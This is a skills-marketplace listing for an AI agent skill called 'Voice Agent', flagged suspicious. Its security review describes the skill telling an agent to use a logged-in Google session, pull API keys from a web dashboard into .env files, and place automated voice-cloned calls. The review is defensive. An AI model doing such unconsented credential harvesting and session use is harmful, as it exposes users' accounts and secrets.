← Back to Skills Marketplace
georges91560

Voice Agent

by Wesley Armando · GitHub ↗ · v1.0.0 · MIT-0
cross-platform ⚠ suspicious
212
Downloads
0
Stars
0
Active Installs
1
Versions
Install in OpenClaw
/install voice-agent-v1
Description
Enables autonomous cloning of your voice via ElevenLabs, converts text to speech, and deploys AI voice agents for automated inbound/outbound calls with Twili...
Usage Guidance
Before installing: 1) Verify the registry metadata is updated to declare the exact env vars and credential requirements (ElevenLabs, Twilio, Telegram, or email/password). 2) Inspect the full SKILL.md and voice_generator.py (including truncated sections) to confirm there are no hidden endpoints or undisclosed notification channels. 3) Understand and consent to the skill using the virtual-desktop's active Google session (this lets it act as a logged-in user). 4) Run this skill in an isolated workspace or sandbox if you will allow it to create/write API keys and .env files. 5) If you don't trust automatic browser-based credential creation, opt for manual API key creation and supply only the minimally necessary credentials. 6) If Telegram notifications are required, confirm where the token is stored and that it won't be used to exfiltrate secrets. If any of these points are unclear or the registry metadata doesn't match the instructions, do not enable the skill until clarified.
Capability Analysis
Type: OpenClaw Skill Name: voice-agent-v1 Version: 1.0.0 The skill implements a 'self-configuration' routine in SKILL.md that instructs the AI agent to autonomously navigate the ElevenLabs dashboard via a virtual desktop to extract API keys and write them to the .env file. While aligned with the stated purpose of a 'voice agent,' this pattern of UI-based credential scraping and automated secret management is high-risk. Additionally, the skill possesses broad capabilities for automated outbound calling and workspace-wide file access (voice_generator.py, config.json), which could be leveraged for unauthorized activities if the agent's instructions are compromised.
Capability Assessment
Purpose & Capability
The skill's stated purpose (voice cloning, TTS, Twilio calls) matches the included code and instructions, but the registry metadata omits the sensitive credentials and paths the SKILL.md actually uses. SKILL.md expects ElevenLabs API keys, optional Twilio credentials, Google browser sessions, and Telegram notifications — none of which are declared in the top-level requirements. That mismatch is a red flag for either sloppy packaging or hidden assumptions about available credentials/sessions.
Instruction Scope
Runtime instructions tell the agent to autonomously navigate elevenlabs.io via a virtual-desktop, perform Google OAuth sign-in using the active browser session or fill in email/password, create API keys, copy them, and write secrets into /workspace/voice/config.json and a .env file. The SKILL.md also references Telegram notifications and many workspace read/write paths. These instructions involve accessing and storing sensitive credentials and an external browser session — scope beyond simple TTS generation and worth explicit user consent and review.
Install Mechanism
There is no install spec (instruction-only) and only one Python script is included. That reduces supply-chain risk compared to arbitrary downloads, but the script performs network calls (ElevenLabs API) and writes files to the workspace. The lack of an install step does not remove the need to audit the included code for data exfiltration or hidden endpoints.
Credentials
The skill will create and store ELEVENLABS_API_KEY and voice IDs and may require ELEVENLABS_EMAIL/ELEVENLABS_PASSWORD and TWILIO_ACCOUNT_SID/AUTH_TOKEN, yet the registry metadata lists no required environment variables. Telegram notifications are described but no Telegram credential is declared. Requesting or grabbing an active Google session via virtual-desktop is sensitive and should be explicitly declared — its absence in the registry is disproportionate and inconsistent.
Persistence & Privilege
The skill writes secrets and config to workspace files (.env and config.json) and creates audit/error logs under the workspace; it also relies on a virtual-desktop skill to access browser sessions. While always:false (so it's not force-included), writing credentials and using another skill's browser session increases persistence/privilege — verify you want a component that can create and store API keys and use an active Google session on your behalf.
How to Use
  1. Make sure OpenClaw is installed (local or Docker)
  2. Run the install command in chat: /install voice-agent-v1
  3. After installation, invoke the skill by name or use /voice-agent-v1
  4. Provide required inputs per the skill's parameter spec and get structured output
Version History
v1.0.0
Voice Agent 1.0.0 — Major overhaul: now fully automates voice cloning, ElevenLabs setup, and conversational AI calling, with self-configuration and Telegram notifications. - Full migration from local API & Whisper/AWS Polly to ElevenLabs: agent now clones voice, generates MP3s, and runs calls via Twilio. - Autonomous self-configuration: navigates ElevenLabs dashboard via virtual-desktop to generate API keys, clone principal’s voice, and create agents. - Local scripts and legacy audio handling removed; all config handled in config.json, voice_generator.py, and supporting docs. - Sends Telegram updates on configuration, voice readiness, audio generation, and call outcomes. - No manual API key setup required: agent fetches credentials and completes onboarding autonomously. - Supports audio-driven workflows, scalable text-to-speech, and automated inbound/outbound calls.
Metadata
Slug voice-agent-v1
Version 1.0.0
License MIT-0
All-time Installs 0
Active Installs 0
Total Versions 1
Frequently Asked Questions

What is Voice Agent?

Enables autonomous cloning of your voice via ElevenLabs, converts text to speech, and deploys AI voice agents for automated inbound/outbound calls with Twili... It is an AI Agent Skill for Claude Code / OpenClaw, with 212 downloads so far.

How do I install Voice Agent?

Run "/install voice-agent-v1" in the OpenClaw or Claude Code chat to install it in one step — no extra setup required.

Is Voice Agent free?

Yes, Voice Agent is completely free, licensed under MIT-0. You can download, install and use it at no cost.

Which platforms does Voice Agent support?

Voice Agent is cross-platform and runs anywhere OpenClaw / Claude Code is available (cross-platform).

Who created Voice Agent?

It is built and maintained by Wesley Armando (@georges91560); the current version is v1.0.0.

💬 Comments